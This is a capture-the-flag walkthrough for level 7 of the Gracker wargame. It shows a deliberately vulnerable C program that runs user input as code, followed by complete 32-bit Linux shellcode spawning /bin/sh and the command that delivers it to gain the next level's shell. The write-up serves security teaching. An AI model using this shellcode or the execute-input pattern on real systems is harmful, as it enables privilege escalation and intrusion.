Gracker level7 (Ghost in the Shellcode!)

Try the challenge thoroughly before reading the write-up. Otherwise, it's your loss.

We ssh to [email protected] and authenticate using the password we had obtained after solving the previous level.

Recap of previous level.

The recap gives a brief summary of the previous level’s solution using gdb. It also provides an alternate method without using gdb. That method uses the fact that the program was also printing out the return address. Do check that method out too. But I think it’s pretty rare that any function will print it’s return address.

Level7

The story of this level reveals that we’ll have to create our own program. On examining the level7.c file, we see that it will execute the code we enter.

level7@gracker:/matrix/level7$ cat level7.c
#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>
#include <string.h>

// gcc level7.c -fno-stack-protector -z execstack -m32 -o level7

char shellcode[128];

int main(int argc, char **argv) {
    if(argc!=2) {
        printf("usage: %s <input>\n", argv[0]);
        exit(1);
    }
    printf("Hello user.\nYou can create a new program in the TRON system that will live in Arjia City:\n");
    // read 128 byte from stdin into `shellcode`
    strcpy(shellcode, argv[1]);
    // looks crazy, but it just jumps to the data inside shellcode and executes it. Look at it with `gdb`
    (*(void(*)()) shellcode)();
}

Go through this walkthrough that I wrote to write shellcode which would spawn a shell. Using it’s final shellcode(\xeb\x18\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x8d\x4e\x08\x89\x46\x0c\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42) directly. Since I had not used any hardcoded addresses in it, it should work fine.

[email protected]:/matrix/level7$ ./level7 $(python -c "print '\xeb\x18\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x8d\x4e\x08\x89\x46\x0c\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42'")
Hello user.
You can create a new program in the TRON system that will live in Arjia City:
$ whoami
level8
$ 

And Voila! we have level8 shell which we can use to read level8 password. I am not revealing the password here so that the readers try the challenge on their own.